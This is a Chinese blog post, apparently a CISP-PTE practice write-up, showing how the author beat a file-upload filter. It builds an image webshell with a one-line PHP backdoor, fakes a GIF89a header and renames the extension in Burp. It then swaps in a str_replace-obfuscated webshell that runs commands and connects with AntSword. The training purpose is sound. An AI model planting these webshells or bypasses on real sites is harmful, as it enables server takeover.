pte练习文件上传

最新推荐文章于 2024-06-13 17:59:16 发布
最新推荐文章于 2024-06-13 17:59:16 发布
阅读量197 收藏 1
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56129970/article/details/130846007
版权
文章讲述了在已知仅支持图片上传的情况下,如何利用PHP代码注入构造图片马,通过修改文件头和后缀,绕过过滤系统进行上传。虽然成功上传,但蚁剑无法连接,于是使用str_replace进行内容过滤绕过,最终实现连接。
摘要由CSDN通过智能技术生成

文件上传练习

在这里插入图片描述题目做了过滤,只支持图片上传
在这里插入图片描述

这个时候就得上bp去改一改了,首先准备一张图片马,先个图片和一句话木马<?php @eavl ($POST['123']); ?>

在这里插入图片描述cmd命令行中输入:copy tp.png/b + mm.php/a tpm.jpg生成一张名叫tpm.jpg的图片马,用编辑器打开图片马,后面有一句话木马就说明图片马生成成功。
在这里插入图片描述
上传图片马,bp抓包,将后缀改为php,图片头改为GIF89a,然后放包

在这里插入图片描述在这里插入图片描述上传成功,访问出现这样页面便是成功了
在这里插入图片描述上传成功了,但蚁剑链接不上,我想可能是对内容做了过滤,于是将一句话木马做点绕过改为<?php $a=str_replace("abc", "", "aabcsabcabcsabceabcrt"); $a($_REQUEST["cmd"]);?>

重复上面步骤,最后上图
在这里插入图片描述蚁剑连接找到key值
在这里插入图片描述

m0_56129970
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
pte-文件上传总结
weixin_51387754的博客
10-15 1074
首页 > CISP > 考试问答 > CISP-PTE是什么考试 CISP-PTE是什么考试 CISP 责任编辑:唐丹平 2022-05-20 摘要:CISP-PTE中文全称是注册渗透测试工程师,英文为Certified Information Security Professiona - Penetration Testing Engineer。 CISP-PTE是册渗透测试工程师认证考试,证书持有人主要从事信息安全技术领域渗透测试工作,具有漏洞验证、制定渗透测试方案与测试计划、编写测试用例、实施测试、
PTE练习文件上传-pikachu
leo788的博客
12-12 268
1.禁用JS脚本只允许上传图片,格式错误提醒但是抓不到包,右键查看源码找到,然后即可跳过js验证完成php文件上传
PTE笔记:文件上传与文件包含
最新发布
小月肖的博客
06-13 813
PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。2)黑名单过滤,不允许上传php、xx等,这时候,上传一个图片码,用bp抓包,在repeater中修改后缀为php3、php4、php5、phtml等;1)白名单过滤,只允许上传xx,这时候就做一个图片码,将图片码上传上去,用bp抓包,在repeater中修改后缀,然后发送,再去浏览器查看。针对../过滤-->双写..././-->..\。
备考CISP-PTE文件上传
网安君的博客
08-29 1153
备考CISP-PTE
CISP-PTE认证考试文件上传
m0_58544284的博客
06-14 514
hunter搜索:body=“cisp-pte 认证考试” 获取免费靶场。
渗透测试CISP-PTE文件上传
未知2066的博客
02-29 1078
文件上传漏洞是一种常见的安全漏洞,指的是攻击者可以通过上传恶意文件来执行任意代码或获取系统权限。这种漏洞通常出现在Web应用程序中,攻击者利用漏洞可以上传包含恶意代码的文件,然后通过访问该文件来执行攻击。
CISP_PTE练习题docker环境
01-19
CISP_PTE练习题docker环境
CISP-PTE模拟练习网站源码.zip
11-22
该压缩包文件"**CISP-PTE模拟练习网站源码.zip**"包含了一个完整的练习平台的源代码,可能涵盖了以下几个方面的重要知识点: 1. **Web开发框架**:源码可能基于某种常见的Web开发框架,如Spring Boot、Django、Node...
PTE讲课PPT
11-29
这个压缩包包含了一份名为"讲课PPT.PDF"的文件,很可能是培训课程的幻灯片,涵盖了渗透测试的核心概念和技术。 渗透测试(Penetration Testing)是网络安全领域中的一个重要环节,它模拟黑客的攻击行为来评估系统和...
PTE-Test-Helper:PTE密钥王练习
04-29
**PTE-Test-Helper** 是一个专门为PTE(Pearson Test of English)考生准备的练习工具,被称为“PTE密钥王练习”。这个工具利用了JavaScript编程语言,旨在帮助考生提升考试技能,熟悉考试流程,并通过模拟练习来...
CISP练习题B
03-12
文件提到的“CISP练习题B”部分,是备考者用来加深对信息安全领域知识掌握和应试技能的辅助材料。 2. 我国信息安全保障工作的阶段与特点: 文档中的第一题描述了我国信息安全保障工作的三个阶段:启动、逐步展开和...
PTE练习文件上传upload-labs
leo788的博客
12-12 558
12题用的是GET方法,13题是POST方法,换汤不换药,但是在post中的截断不是在url中显示,因此其不需要url编码。其中,这里先执行首尾删除空格-删除末尾点-以点作为分隔-转换为小写-去除文件流-首尾删除空格,利用此在后缀处添加(点空格点)进行绕过,经过过滤后的后缀名带点,绕过黑名单php后缀。查看源码,其对文件类型进行判别,所以是MIME类型,将2.php上传后修改其类型为image/jpeg,转发包,成功。缺少空格,但是后缀中的空格会被系统删掉,所以通过抓包修改后缀名+空格。
PTE_文件上传wp
CHUNJIUJUN的博客
08-12 521
上传.php抓包发到repeater 改包 这是截图的时候打错了,应该是jpeg,还是失败,改大写 失败,改一句话 成功,去试一试 全选覆盖掉intercept 右键 然后把包放完 还是没成功,没有解析 重新之前所有步骤,尝试把phP改成php5然后继续Do intercept加放包发现可以解析了,但命令不执行,于是再试试把一句话的jm的单引号去掉,Do intercept,放包 输入命令,执行了,接下来cat key.php就行了 ...
文件上传(包括编辑器上传)漏洞绕过总结(适用于pte考试、ctf及常规测试、修复任意文件上传漏洞可做参考)
weixin_42075643的博客
03-28 3873
文件上传绕过总结;编辑器文件上传;渗透测试记录
pte日志之文件上传靶场
alspwhite的博客
04-24 243
文件上传漏洞
php上传文件程序,PHP上传文件
weixin_27006759的博客
03-29 99
#########################################function getname($exname){$dir = "../";$i=1;if(!is_dir($dir)){mkdir($dir,0777);}while(true){if(!is_file($dir.$i.".".$exname)){$name=$i.".".$exname;break;}$i++;...
pte练习题(34041-34045)
haoaaao的博客
02-04 1730
一、34041(sql注入????????) 1、题目给出要读取文件的目录 2、进入题目,已经给出查询语句,加')%23将语句闭合: 3、order by测试列数,发现空格被屏蔽,使用/**/绕过: 4列可以正常执行,5列执行出错,说明数据库有4列; 4、使用联合查询(注意使用联合查询,前面的值要为-1): (1)union select 1,2,3,4,发现union被替换为/**/,双写绕过: (2)发现1234都是可以注入的位置,随便找一个...
cisp-pte靶场第二题文件上传通关及思路
li_minjian的博客
01-04 4737
1.文件上传题 2.文件上传点 3.尝试上传php文件,发现只能上传图片文件 4.尝试生成一个图片马 copy/b 1.jpeg+2.txt 3.jpeg 生成3.jpeg 5.上传3.jpeg,bp抓包 改包,大小写绕过 6.访问3.php文件 7.菜刀连接拿到key.php ...
CISP-PTE渗透测试实战:SQL注入、文件上传与包含解析
"CISP-PTE渗透测试实操题包含了三个主要的网络安全测试环节:SQL注入、文件上传和文件包含。这些题目旨在检验考生对常见Web应用漏洞的理解与利用能力,以及对安全防护策略的掌握程度。" 在SQL注入部分,题目提供了...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值